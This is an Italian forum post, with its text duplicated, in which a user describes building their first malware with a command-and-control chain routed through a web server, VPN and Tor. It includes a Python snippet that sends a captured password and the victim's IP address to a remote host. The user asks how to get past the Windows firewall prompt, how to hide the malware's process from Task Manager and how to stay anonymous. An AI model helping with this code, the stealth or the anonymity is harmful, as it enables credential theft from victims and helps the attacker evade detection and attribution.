X
xWasd
Ultima modifica da un moderatore:
Salve ragazzi, sto programmando il mio primo malware, che funziona pressapoco cosi
VITTIMA <-----> WEB SERVER<----->[forse free vpn, devo decidere]<------->TOR<------>IO
(con file di testo dove scrivo i comandi)
Avrei 3 domande:
1)il firewall di windows (se attivo), chiede all'utente se vuole permettere a x.exe di accedere a internet o no?
Il pezzo dello script è in python ed è questo:
__________________________________________________________________________________________
headers = {}
headers['User-Agent'] = 'New bot'
try:
request = urllib2.Request(host+psw+"&ip="+ip,headers=headers)
response = urllib2.urlopen(request)
response.close()
__________________________________________________________________________________________
2)Esiste un metodo non troppo complicato per nascondere il processo in background del malware? In modo tale che aprendo la gestione delle attività non risulti niente..
3)Io rimango abbastanza anonimo? Come web server ne userei uno free creato mentre sono dietro tor, e in più in un internet point. Il malware è sempre criptato, tranne ogni tot minuti, ovvero quando si decripta per vedere se ci sono nuovi comandi da eseguire, poi li esegue e si ridecripta.
VITTIMA <-----> WEB SERVER<----->[forse free vpn, devo decidere]<------->TOR<------>IO
(con file di testo dove scrivo i comandi)
Avrei 3 domande:
1)il firewall di windows (se attivo), chiede all'utente se vuole permettere a x.exe di accedere a internet o no?
Il pezzo dello script è in python ed è questo:
__________________________________________________________________________________________
headers = {}
headers['User-Agent'] = 'New bot'
try:
request = urllib2.Request(host+psw+"&ip="+ip,headers=headers)
response = urllib2.urlopen(request)
response.close()
__________________________________________________________________________________________
2)Esiste un metodo non troppo complicato per nascondere il processo in background del malware? In modo tale che aprendo la gestione delle attività non risulti niente..
3)Io rimango abbastanza anonimo? Come web server ne userei uno free creato mentre sono dietro tor, e in più in un internet point. Il malware è sempre criptato, tranne ogni tot minuti, ovvero quando si decripta per vedere se ci sono nuovi comandi da eseguire, poi li esegue e si ridecripta.